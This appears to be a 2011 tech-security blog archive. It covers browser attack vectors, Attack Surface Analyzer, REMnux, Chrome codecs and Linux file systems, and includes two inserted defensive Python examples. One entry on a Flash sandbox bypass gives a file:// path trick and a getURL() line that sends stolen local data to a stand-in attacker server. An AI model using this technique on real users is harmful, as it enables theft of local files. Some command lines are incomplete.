Three web attack vectors seem to be responsible for the majority of computer attacks that involve a web browser:
- The attack can incorporate an element of social engineering to persuade the victim to take an action that compromises security. For instance, the victim can supply data to a phishing site or install a program that will turn out to be malicious.
- The attacker can use the browser as a gateway for attacking web applications via techniques such as cross-site scripting (XSS), Cross-Site Request Forgery (CSRF) and Clickjacking.
- The attacker can exploit a vulnerability in the web browser or in local software that the browser can invoke. Such client-side exploits have targeted browser add-ons such as Flash, Adobe Reader and Java Runtime Environment (JRE).
Most attacks include one or two of the three techniques. For instance, Koobface worm targets the user (social engineering to click links) and the web application (hijacking social networking site sessions). An attack that combines all elements would be particularly effective (do you know of any examples?).
The following series of posts explores these three web browser attack vectors in greater detail, discussing how enterprises can protect themselves against such attacks:
- Mitigating Attacks on the User of the Web Browser
- Mitigating Attacks on Web Applications Through the Browser
- Mitigating Attacks on the Web Browser and Add-Ons
— Lenny Zeltser
Wednesday, January 26, 2011
Monday, January 24, 2011
Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface. The tool takes snapshots of an organization's system and compares ("diffing") these to identify changes. The tool does not analyze a system based on signatures or known vulnerabilities; instead, it looks for classes of security weaknesses as applications are installed on the Windows operating system.
The tool also gives an overview of the changes to the system Microsoft considers important to the security of the platform and highlights these in the attack surface report. The Microsoft Security Development Lifecycle (SDL) requires development teams to define a given product's default and maximum attack surface during the design phase to reduce the likelihood of exploitation wherever possible. Additional information can be found in the Measuring Relative Attack Surface paper.
Some of the checks performed by the tool include analysis of changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters that affect a computer's attack surface.
Download the free tool (x64 and x86) at http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e068c224-9d6d-4bf4-aab8-f7352a5e7d45&displaylang=en
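The before/after comparison described above can be sketched as follows. This is an added example, not code from the tool or from Microsoft; the snapshot layout, the principal and rights sets, and all sample values are assumptions constructed for illustration.

```python
# Added illustration; the snapshot layout and values are constructed, not Attack Surface Analyzer's format.
LOW_PRIV = {"Everyone", "Users", "Authenticated Users"}  # assumed low-privilege principals
WRITE_RIGHTS = {"F", "M", "W"}  # icacls-style simple rights: full, modify, write

def weak_principals(acl):
    """Low-privileged principals that hold a write-capable right in this ACL."""
    return sorted(p for p, rights in acl.items()
                  if p in LOW_PRIV and WRITE_RIGHTS & set(rights))

def diff_snapshots(before, after):
    """Report classes of attack-surface change, not known-bad signatures."""
    report = {
        "new_ports": sorted(set(after["ports"]) - set(before["ports"])),
        "new_services": sorted((name, svc["account"])
                               for name, svc in after["services"].items()
                               if name not in before["services"]),
        "weak_new_files": [],
        "acl_weakened": [],
    }
    for path, acl in sorted(after["files"].items()):
        weak_now = weak_principals(acl)
        if path not in before["files"]:
            if weak_now:  # new file that non-admins can modify
                report["weak_new_files"].append((path, weak_now))
        else:
            gained = sorted(set(weak_now) - set(weak_principals(before["files"][path])))
            if gained:  # existing file whose ACL became more permissive
                report["acl_weakened"].append((path, gained))
    return report

# Constructed snapshots taken before and after installing a hypothetical product.
BEFORE = {
    "ports": [135, 445],
    "services": {"Spooler": {"account": "LocalSystem"}},
    "files": {r"C:\Shared\app.ini": {"Administrators": ["F"], "Everyone": ["R"]}},
}
AFTER = {
    "ports": [135, 445, 8443],
    "services": {"Spooler": {"account": "LocalSystem"},
                 "DemoAgent": {"account": "LocalSystem"}},
    "files": {
        r"C:\Shared\app.ini": {"Administrators": ["F"], "Everyone": ["M"]},
        r"C:\Program Files\Demo\agent.exe": {"Administrators": ["F"], "Users": ["F"]},
        r"C:\Program Files\Demo\readme.txt": {"Administrators": ["F"], "Users": ["RX"]},
    },
}

if __name__ == "__main__":
    print(diff_snapshots(BEFORE, AFTER))
```

The report flags the new listener, the new service, the user-writable binary and the loosened ACL, while the read-only readme produces no finding.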
Sunday, January 23, 2011
There are some good docs to get you up and running at their wiki site: Installation Guide, Getting Started, Console Quick Start, GUI Quick Start, Full Documentation. Follow them at Inguma Development.
Download it at http://code.google.com/p/inguma/
Saturday, January 22, 2011
Monday, January 17, 2011
We were pretty stoked when Google debuted its multiple account sign-in feature, and reader Sam has discovered a way to switch between accounts faster using a small URL tweak.
I was flipping between two Gmail account tabs using Google's multiple logins feature, and I noticed that the two URLs are almost identical:
https://mail.google.com/mail/u/1/#inbox. It turns out that switching between the 0 and 1 (and presumably higher numbers if there are more than 2 accounts logged in) switches accounts. In particular, since there is no keyboard shortcut for switching between accounts, editing the URL may be the fastest way to do so using only the keyboard.
In fact, the fastest way to switch between them using only the keyboard would be to bookmark the sites and create address bar keywords for them, so you can flip back and forth using just a few keystrokes instead of having to use your mouse. Thanks, Sam!
Saturday, January 15, 2011
Download the new version of REMnux from its main page as a virtual appliance and/or as a Live CD. Here are the quick highlights of the tools it supports.
Malicious Websites Analysis:
- Updated version of Jsunpack-n (proxy support, encrypted PDF handling)
- Includes Stunnel (for interception of SSL sessions)
- Includes RABCDAsm toolkit for reverse-engineering malicious Flash (SWF) programs.
- Includes tor and torsocks (for anonymizing interactions with suspicious websites)
- Includes Burp Suite Free Edition.
- Updated Volatility memory forensics framework to version 1.4 RC 1 (supports Windows Vista and Windows 7).
- Includes AESKeyFinder and RSAKeyFinder tools (for finding AES and RSA keys in a memory image).
- Includes pyOLEScanner.py (for analysis of malicious Microsoft Office documents).
- Includes libemu library to obtain the “sctest” tool (for shellcode analysis).
- Added the “whois” utility.
- Added xortools.py and pescanner.py tools (from Malware Analyst’s Cookbook).
- Installed VBinDiff for viewing and comparing files.
- Installed ircII to supplement the Irssi IRC client.
- Added the VirusTotal VTzilla Firefox extension.
- Added md5deep to assist with hash-calculation operations.
- Added ClamAV for manually scanning suspicious files and generating signatures.
Thursday, January 13, 2011
However, there is a longer list of unpatched Microsoft vulnerabilities at VUPEN Security. Any 0day there?
Go to "Blue Screen" in Designers Colors within One Click.
Today, I found this, called LibreOffice. It is available for Linux (x86 and 64 bit), Mac OS X, and Windows. Most importantly, it supports docx format natively.
We expect even more rapid innovation in the web media platform in the coming year and are focusing our investments in those technologies that are developed and licensed based on open web principles. To that end, we are changing Chrome's HTML5 <video> support to make it consistent with the codecs already supported by the open Chromium project. Specifically, we are supporting the WebM (VP8) and Theora video codecs, and will consider adding support for other high-quality open codecs in the future. Though H.264 plays an important role in video, as our goal is to enable open innovation, support for the codec will be removed and our resources directed towards completely open codec technologies.
Google decided to pick sides, much like Mozilla and Opera, in an effort to encourage developers to use WebM. Right now, the only important website that uses WebM is YouTube, Google's video sharing service. Internet Explorer, Safari and iOS devices are unlikely to support WebM, while hardware acceleration and Flash support are expected later this year.
John Gruber thinks that 'this is just going to push publishers toward forcing Chrome users to use Flash for video playback — and that the video that gets sent to Flash Player will be encoded as H.264'. He also finds it ironic that Google Chrome bundles Adobe's proprietary Flash plugin, which is a great software for playing H.264 videos.
VP8 has a long way to go before becoming the codec of choice for Web videos and Google decided to make it more popular by dropping support for the competing codec from its browser. Last year, Andy Rubin said that sometimes being open 'means not being militant about the things consumers are actually enjoying,' but that's not the case here.
Thursday, January 06, 2011
- Flash is designed around the sandbox concept.
- Flash cannot read local files except for the cookie files.
- Bypass the restriction and make Flash access any local and remote files.
- Found a protocol handler that wasn't blacklisted by Adobe.
- The user is not prompted for permission during the bypass attempt.
- Use file:// to point to the local system. E.g.: file://\\192.168.1.1\stolen-data-here\
- Then pass the content back to the attacker's server via getURL(). E.g.: getURL('mhtml:http://attacker-server.com/stolen-data-here', '');
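The bypass above worked because a handler was missing from a blacklist. As an added example (not from the original post or from Adobe), the following audit scans decompiled ActionScript for getURL() targets and shows which ones a blacklist misses and an allowlist catches; both scheme lists and the sample script are constructed assumptions.

```python
import re

# Added illustration: both lists are constructed for this example and are not
# Adobe's actual handler list.
DENYLIST = {"file", "javascript", "vbscript"}   # "handlers someone thought of"
ALLOWLIST = {"http", "https"}                   # schemes a SWF is expected to use

GETURL_CALL = re.compile(r"""getURL\s*\(\s*(['"])(?P<url>.*?)\1""", re.IGNORECASE)
SCHEME = re.compile(r"^\s*([A-Za-z][A-Za-z0-9+.-]*):")

def scheme_of(url):
    """Lower-cased URL scheme, or '' for a relative URL."""
    m = SCHEME.match(url)
    return m.group(1).lower() if m else ""

def passes_denylist(url):
    return scheme_of(url) not in DENYLIST

def passes_allowlist(url):
    return scheme_of(url) in ALLOWLIST | {""}

def audit_geturl(source):
    """Return (scheme, url, missed_by_denylist) for each getURL target that
    falls outside the allowlist in decompiled ActionScript text."""
    findings = []
    for call in GETURL_CALL.finditer(source):
        url = call.group("url")
        if not passes_allowlist(url):
            findings.append((scheme_of(url), url, passes_denylist(url)))
    return findings

# Constructed ActionScript, as a decompiler might print it.
SAMPLE = '''
getURL("http://www.example.com/help.html", "_blank");
getURL('mhtml:http://collector.example/upload', '');
getURL("FILE:///C:/Users/demo/notes.txt", "");
getURL("next_page.html");
'''

if __name__ == "__main__":
    for scheme, url, missed in audit_geturl(SAMPLE):
        print(f"{scheme:8} missed_by_denylist={missed}  {url}")
```

The mhtml: target is reported with missed_by_denylist=True, which is the gap the post describes; the allowlist rejects it without needing to know the handler exists.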
Monday, January 03, 2011
Here are some great points for me (from the article):
- Compared to ext2/ext3, ext4 is better for SSD and general performance.
- BtrFS is great for servers due to its features: performance, snapshots, transparent compression, and online defragmentation.
- ReiserFS is great for small files (log), database and email servers.
- XFS only works great for large files that require constant throughput (media files).
- JFS works great for both small and large files, with very low CPU usage.
- ZFS, an advanced file system that shows great performance in large disk arrays, supports drive pooling, snapshots, and dynamic disk striping.
HTG Explains: Which Linux File System Should You Choose?
What is Journaling?
File System Options
- At this time you probably should not use Ext in any machine due to its limitation and age. It also is no longer supported in many distributions.
- Due to lower write requirements, and hence lower erases, it is ideal for flash memory especially on USB flash drives.
- Modern SSDs have an increased life span and additional features that can negate the need for using a non-journaling file system.
- Use if you need to upgrade a previous Ext2 file system to have journaling.
- You will probably get the best database performance from Ext3 due to years of optimizations.
- Not the best choice for file servers because it lacks disk snapshots and file recovery is very difficult if deleted.
- A better choice for SSDs than Ext3 and improves on general performance over both previous Ext versions. If this is your distro’s default supported file system, you should probably stick with it for any desktop or laptop you set up.
- It also shows promising performance numbers for database servers, but hasn’t been around as long as Ext3.
- BtrFS makes a great server file system due to its performance, snapshots, and many other features.
- Oracle is also working on a replacement for NFS and CIFS called CRFS which boasts better performance and more features, making it the best choice for a file server.
- The performance tests have shown it to lag behind Ext4 on flash memory such as SSDs, as a database server, and even certain cases of general system read/writes.
- Ubuntu 10.10 only allows you to install BtrFS if you use the text-based alternate install CD, and your /boot partition still requires an Ext file system.
- Has great performance for small files such as logs and is suited for databases and email servers.
- ReiserFS can be dynamically expanded but not shrunk and does not support FS level encryption.
- The future of Reiser4 is questionable and BtrFS is probably a better choice.
- Good for a media file server because of constant throughput for large files.
- Most distributions require a separate /boot partition because XFS and GRUB can be unpredictable.
- Performance with small files is not as good as other file systems making it a poor choice for databases, email, and other servers that have a lot of logs.
- Not as well supported as Ext for personal computers and doesn’t have significant performance improvements or features over Ext3/4.
- Good performance for both large and small files and because of its low CPU usage is probably best for low powered servers and computers.
- It does not have built in tools for drive pooling so it may not be as expandable as something like BtrFS, but for a netbook with only 1 hard drive it may be a good option.
- It also has fast disk checking compared to Ext but there have been some reports of disk corruption after long term use.
- Shows great performance in large disk arrays.
- Supports a lot of advanced features including drive pooling, snapshots, and dynamic disk striping.
- It may be difficult to install in Linux because it requires FUSE and might not be supported by your distribution.
So Which One Should You Choose?
So now that you understand the differences between the file systems, which one would you choose?
Sunday, January 02, 2011
- Do you know why it starts with UUID?
- Do you know you can mount an NTFS partition with the ntfs-3g driver?
- How about the options? auto/noauto? exec/noexec? ro/rw? sync/async? user/nouser?
- Do you know that "user" option automatically implies "exec"?
- What are dumping and pass?
Preparing your system:
- sudo apt-get install build-essential checkinstall
- sudo apt-get install subversion git-core mercurial
- sudo mkdir /usr/local/src
- sudo chown $USER /usr/local/src
- sudo apt-get install apt-file
- sudo apt-file update
- cd /usr/local/src
- tar -zxvf
- [ or ] tar -jxvf
- cd /usr/local/src/
- [ optional ] sudo apt-get install autoconf
- [ optional ] apt-file search
- [ optional ] sudo apt-get install
- sudo checkinstall
- [ add description accordingly ]